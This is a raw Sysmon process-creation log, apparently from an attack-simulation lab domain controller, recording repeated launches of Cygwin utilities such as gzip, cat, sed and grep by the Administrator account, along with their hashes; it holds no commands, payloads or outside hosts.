14:55:56.804{A8622C2F-53FC-6078-F409-00000000AE01}1844C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-F209-00000000AE01}7016C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051041Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.804{A8622C2F-53FC-6078-F309-00000000AE01}5396C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051029Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.797{A8622C2F-53FC-6078-F209-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051017Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.789{A8622C2F-53FC-6078-F109-00000000AE01}5412C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-F009-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051007Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.782{A8622C2F-53FC-6078-F009-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.773{A8622C2F-53FC-6078-EF09-00000000AE01}5964C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-ED09-00000000AE01}612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.766{A8622C2F-53FC-6078-EE09-00000000AE01}5444C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-EB09-00000000AE01}5220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050975Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.766{A8622C2F-53FC-6078-ED09-00000000AE01}612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050956Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.758{A8622C2F-53FC-6078-EC09-00000000AE01}6240C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-EA09-00000000AE01}5800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050955Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.758{A8622C2F-53FC-6078-EB09-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050943Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.751{A8622C2F-53FC-6078-EA09-00000000AE01}5800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.743{A8622C2F-53FC-6078-E909-00000000AE01}6672C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-E809-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.736{A8622C2F-53FC-6078-E809-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.728{A8622C2F-53FC-6078-E709-00000000AE01}5860C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-E509-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050890Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.719{A8622C2F-53FC-6078-E509-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050889Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.719{A8622C2F-53FC-6078-E609-00000000AE01}616C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-E309-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.711{A8622C2F-53FC-6078-E409-00000000AE01}5108C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-E209-00000000AE01}5184C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050869Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.711{A8622C2F-53FC-6078-E309-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050857Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.704{A8622C2F-53FC-6078-E209-00000000AE01}5184C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.691{A8622C2F-53FC-6078-E109-00000000AE01}5620C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-E009-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.684{A8622C2F-53FC-6078-E009-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.676{A8622C2F-53FC-6078-DF09-00000000AE01}1496C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-DD09-00000000AE01}7016C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050806Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.669{A8622C2F-53FC-6078-DE09-00000000AE01}5144C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-DB09-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.668{A8622C2F-53FC-6078-DD09-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.661{A8622C2F-53FC-6078-DC09-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-DA09-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.661{A8622C2F-53FC-6078-DB09-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050770Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.654{A8622C2F-53FC-6078-DA09-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050758Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.646{A8622C2F-53FC-6078-D909-00000000AE01}5628C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-D809-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050748Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.639{A8622C2F-53FC-6078-D809-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.631{A8622C2F-53FC-6078-D709-00000000AE01}5212C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-D509-00000000AE01}5804C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050718Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.624{A8622C2F-53FC-6078-D609-00000000AE01}4160C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-D309-00000000AE01}5664C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050716Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.623{A8622C2F-53FC-6078-D509-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050697Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.616{A8622C2F-53FC-6078-D409-00000000AE01}5860C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-D209-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.616{A8622C2F-53FC-6078-D309-00000000AE01}5664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050684Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.609{A8622C2F-53FC-6078-D209-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050672Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.602{A8622C2F-53FC-6078-D109-00000000AE01}6448C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-D009-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.595{A8622C2F-53FC-6078-D009-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.586{A8622C2F-53FC-6078-CF09-00000000AE01}3200C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-CD09-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050632Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.579{A8622C2F-53FC-6078-CE09-00000000AE01}5396C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-CB09-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050630Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.579{A8622C2F-53FC-6078-CD09-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050611Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.572{A8622C2F-53FC-6078-CC09-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-CA09-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.572{A8622C2F-53FC-6078-CB09-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050598Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 